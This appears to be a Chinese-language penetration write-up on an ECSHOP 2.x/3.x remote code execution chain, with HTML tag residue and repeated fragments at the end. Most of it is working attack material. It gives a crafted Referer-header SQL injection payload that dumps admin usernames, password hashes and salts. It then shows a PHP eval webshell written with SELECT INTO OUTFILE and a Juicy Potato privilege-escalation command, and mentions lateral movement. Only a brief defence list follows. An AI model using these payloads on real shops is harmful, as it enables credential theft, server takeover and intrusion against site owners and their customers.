ECSHOP实战渗透技术分析<\/h1>

漏洞概述<\/h2>
本文详细分析ECSHOP 2.x\/3.x版本存在的远程代码执行(RCE)漏洞，该漏洞通过可控函数造成SQL注入，最终实现代码执行。<\/p>

漏洞利用原理<\/h2>

核心Payload<\/h3>

ECSHOP存在一个可利用的RCE漏洞，攻击者可以通过构造特定的HTTP头实现攻击：<\/p>

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:3:"669";s:2:"id";s:103:"updatexml(1,concat(0x7e,(select group_concat(user_name,0x7e,password) from webpos.ecs_admin_user)),1) #";}
<\/code><\/pre>
漏洞分析<\/h3>

漏洞触发点在于ECSHOP对用户输入的处理不当<\/li>
通过可控函数构造SQL注入<\/li>
利用报错注入获取敏感信息<\/li>
<\/ol>
详细渗透步骤<\/h2>
第一步：信息收集<\/h3>

确认目标系统为ECSHOP 2.x或3.x版本<\/li>
识别系统运行环境：Windows 2012 Server Data<\/li>
<\/ol>
第二步：初始攻击<\/h3>

使用已知RCE payload进行测试<\/li>
观察到MySQL报错信息，确认漏洞存在<\/li>
<\/ol>
第三步：数据库信息提取<\/h3>

使用updatexml()函数进行报错注入

每次只能返回32位数据<\/li>
可使用mid()或substr()函数获取完整数据<\/li>
<\/ul>
<\/li>
获取管理员账户信息：
select<\/span> group_concat(user_name,0<\/span>x7e,password) from<\/span> webpos.ecs_admin_user
<\/span><\/span><\/code><\/pre><\/li>
获取salt值用于密码解密<\/li>
<\/ol>
第四步：后台利用<\/h3>

使用获取的凭证登录后台<\/li>
发现具有SQL查询功能且权限全开<\/li>
<\/ol>
第五步：文件写入<\/h3>

检查文件写入限制：
show<\/span> variables like<\/span> '%secure%'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
寻找可写目录<\/li>
写入Webshell：
Select<\/span> '<?php eval($_POST[cmd])?>'<\/span> into<\/span> outfile 'E:\/\/zz\/\/zz\/\/zz.php'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
第六步：权限提升<\/h3>

系统信息收集：
ipconfig \/all
<\/span><\/span>whoami \/all
<\/span><\/span>systeminfo
<\/span><\/span><\/code><\/pre><\/li>
发现系统无补丁，当前用户为iuser<\/li>
使用Juicy Potato提权：
juicypotato.exe -p "whoami"<\/span> -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
第七步：横向移动<\/h3>

扫描C段网络<\/li>
检查开放端口<\/li>
<\/ol>
技术要点总结<\/h2>

报错注入限制<\/strong>：updatexml()函数每次只能返回32位数据，需配合字符串切割函数获取完整信息<\/li>
密码加密方式<\/strong>：ECSHOP使用salt加密，需获取salt值才能解密<\/li>
文件写入限制<\/strong>：MySQL的secure_file_priv设置可能限制文件写入位置<\/li>
提权方法<\/strong>：在Windows系统上可利用Juicy Potato等工具提权<\/li>
<\/ol>
防御建议<\/h2>

及时升级ECSHOP到最新版本<\/li>
限制MySQL的文件写入权限<\/li>
加强后台访问控制<\/li>
定期更新系统补丁<\/li>
使用最小权限原则配置数据库账户<\/li>
<\/ol>
附录：常用Payload<\/h2>

获取管理员账户：
updatexml(1,concat(0x7e,(select group_concat(user_name,0x7e,password) from webpos.ecs_admin_user)),1) #
<\/code><\/pre>
<\/li>
获取salt值：
updatexml(1,concat(0x7e,(select salt from webpos.ecs_admin_user limit 1)),1) #
<\/code><\/pre>
<\/li>
<\/ol>
通过本文的分析，安全研究人员可以全面了解ECSHOP系统的这一漏洞利用链，同时也为系统管理员提供了有效的防御思路。<\/p>

ECSHOP实战渗透技术分析<\/h1>

漏洞概述<\/h2> 本文详细分析ECSHOP 2.x\/3.x版本存在的远程代码执行(RCE)漏洞，该漏洞通过可控函数造成SQL注入，最终实现代码执行。<\/p>

漏洞利用原理<\/h2>

详细渗透步骤<\/h2>

漏洞概述<\/h2>
本文详细分析ECSHOP 2.x\/3.x版本存在的远程代码执行(RCE)漏洞，该漏洞通过可控函数造成SQL注入，最终实现代码执行。<\/p>